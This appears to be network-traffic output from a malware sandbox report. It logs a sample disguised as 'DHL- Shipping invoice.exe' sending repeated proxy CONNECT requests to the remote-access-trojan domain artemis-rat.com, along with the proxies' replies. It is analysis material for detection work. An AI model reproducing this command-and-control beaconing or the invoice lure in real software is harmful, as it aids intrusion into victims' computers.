                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.729584932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1753192.168.2.45517795.164.89.12388886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.730412006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1754192.168.2.455007103.180.126.4281816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.731266975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1755192.168.2.455259104.17.16.87806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.732907057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.820287943 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1756192.168.2.455270172.67.105.234806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.733561039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.820842981 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1757192.168.2.455106132.148.128.88266066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.735197067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453181028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453391075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1758192.168.2.455290185.238.228.202806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.735280037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.822273016 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1759192.168.2.453222194.233.78.142355136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.735694885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750063896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843936920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.907229900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.952909946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1760192.168.2.455222161.97.173.42539486484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.749191046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250085115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.750550985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.816116095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950352907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.953252077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047010899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.047063112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.047036886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1761192.168.2.4552343.9.71.16731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.749918938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.909138918 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1762192.168.2.45509343.155.153.244156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.749922991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1763192.168.2.45447591.134.140.16054016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.751019955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.250133038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1764192.168.2.45534643.135.160.1524436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.751147985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1765192.168.2.455240147.75.34.86100006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.751152039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.265718937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.430063963 CET65INHTTP/1.1 200 Connection Established
                            Proxy-Agent: Zscaler/6.3


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1766192.168.2.45510543.155.165.196156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.752002954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1767192.168.2.455243188.166.17.1888816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.752644062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1768192.168.2.450672162.240.208.185565366484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.752984047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.859137058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062614918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.062777996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.064932108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:43.062268019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:55.062252045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:19.062376976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:07.062299967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1769192.168.2.455215212.127.93.18580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.753441095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1770192.168.2.455226149.62.244.2741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.754035950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1771192.168.2.455118182.106.220.25290916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.754185915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.088298082 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:37:09 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1772192.168.2.45535943.135.160.1524436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.754899979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1773192.168.2.45536243.135.160.1524436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.757510900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1774192.168.2.45536543.135.160.1524436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.758981943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1775192.168.2.45523831.43.33.5641536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.760142088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1776192.168.2.45512547.103.112.8688996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.761456013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.327770948 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1777192.168.2.455271142.4.123.41806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.768733025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1778192.168.2.455141125.122.26.24210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.773972988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1779192.168.2.455310154.205.152.9690806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.775505066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.921721935 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1780192.168.2.455094148.72.215.23097906484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.775775909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562527895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.750312090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1781192.168.2.45527337.44.238.2571676484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.780611038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
